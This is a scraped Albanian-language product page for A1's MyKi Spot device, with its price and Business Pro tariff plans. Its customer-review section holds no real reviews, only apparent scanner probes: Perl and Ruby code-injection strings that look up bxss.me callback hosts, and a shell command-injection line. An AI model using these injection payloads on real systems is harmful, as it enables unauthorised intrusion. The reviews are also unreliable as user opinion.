Sasi të kufizuara
Në dispozicion
Nuk është në dispozicion onlajn
Ngjyrën: Black

Në dispozicion në sasi të kufizuara

Në dispozicion

Nuk është në dispozicion onlajn

Mënyra e pagesës
Me tarif� t� nj�hershme prej 199 den. p�r pajisje me k�ste
Çmimi i pajisjes

4.499 den.

Çmimi

4.499 den.

Transporti falas

A dëshironi të dini kur do të ketë në dispozicion

Sasi të kufizuara
Në dispozicion
Nuk është në dispozicion onlajn

A1 Business Pro XS

589 den./muaj

Tarifa e rekomanduar
 
8GB
 
internet kombëtar 
 
 
 
  
  
Pakufi
 
minuta dhe SMS 
  
 
  
  
 
  
  
 
  
  
 
  
  

Çmimi për MyKi Spot

999 den.
Zgjidhni

A1 Business Pro S

943 den./muaj

Tarifa e rekomanduar
 
80GB
 
internet kombëtar 
  
  
Pakufi
 
minuta dhe SMS 
  
 
  
  
 
  
  
 
  
  
 
  
  

Çmimi për MyKi Spot

0 den.
Zgjidhni

A1 Business Pro M

1.297 den./muaj

Tarifa e rekomanduar
5G
 
pakufi
 
internet kombëtar 
  
  
Pakufi
 
minuta dhe SMS 
  
2GB
 
interneti në roaming 
  
50 minuta
 
biseda ndërkombëtare 
  
50
 
SMS ndërkombëtarë 
  
 
 
  
  

Çmimi për MyKi Spot

0 den.
Zgjidhni

A1 Business Pro L

2.123 den./muaj

Tarifa e rekomanduar
5G
 
pakufi
 
internet kombëtar 
  
  
Pakufi
 
minuta dhe SMS 
  
3GB
 
interneti në roaming 
  
100 minuta
 
biseda ndërkombëtare 
  
100
 
SMS ndërkombëtarë 
  
100 minuta
 
roaming biseda 
  

Çmimi për MyKi Spot

0 den.
Zgjidhni

A1 Business Pro XL

3.185 den./muaj

Tarifa e rekomanduar
5G
 
pakufi
 
internet kombëtar 
  
  
Pakufi
 
minuta dhe SMS 
  
5GB
 
interneti në roaming 
  
150 minuta
 
biseda ndërkombëtare 
  
150
 
SMS ndërkombëtarë 
  
150 minuta
 
roaming biseda 
  

Çmimi për MyKi Spot

0 den.
Zgjidhni
Zgjidhni tarifën
Kthimi i produktit
Dorëzim falas
Gjithmon në përfiti
Pagesë e sigurtë

MyKi Spot

Çka ka në kuti?
  Karakteristikat themelore
  Karakteristikat e hollësishme
  Garancia dhe servisi
  muajgarancia e prodhuesit
  Servisues i autorizuar për këtë pajisje

  Nëse keni nevojë për servis për MyKi Spot, kontaktoni servisuesin e autorizuar.

  MyKi Spot

  Vlerësimi nga shfrytëzuesit

  Ka gjithsej 10 recenzione për këtë pajisje

  4
  6
  0
  0
  0
  4.4
  '.gethostbyname(lc('hitxf'.'mmavhmyse1265.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(87).chr(112).chr(88).'
  21.01.2023

  A Ju ndihmoi ky recenzion?
  ".gethostbyname(lc("hitpy"."wsoebxeya3a51.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(87).chr(104).chr(87)."
  21.01.2023

  A Ju ndihmoi ky recenzion?
  |echo ndilmr$()\ dzjfal\nz^xyu||a #' |echo ndilmr$()\ dzjfal\nz^xyu||a #|" |echo ndilmr$()\ dzjfal\nz^xyu||a #
  21.01.2023

  A Ju ndihmoi ky recenzion?
  zFPWdwPk
  21.01.2023

  A Ju ndihmoi ky recenzion?
  zFPWdwPk
  21.01.2023

  A Ju ndihmoi ky recenzion?
  zFPWdwPk
  21.01.2023

  A Ju ndihmoi ky recenzion?
  "+"A".concat(70-3).concat(22*4).concat(117).concat(75).concat(122).concat(85)+(require"socket" Socket.gethostbyname("hiteu"+"lzgjumwwb8de7.bxss.me.")[3].to_s)+"
  21.01.2023

  A Ju ndihmoi ky recenzion?
  '+'A'.concat(70-3).concat(22*4).concat(121).concat(69).concat(122).concat(87)+(require'socket' Socket.gethostbyname('hitcm'+'tndocfdd47906.bxss.me.')[3].to_s)+'
  21.01.2023

  A Ju ndihmoi ky recenzion?
  zFPWdwPk
  21.01.2023

  A Ju ndihmoi ky recenzion?
  zFPWdwPk
  21.01.2023

  A Ju ndihmoi ky recenzion?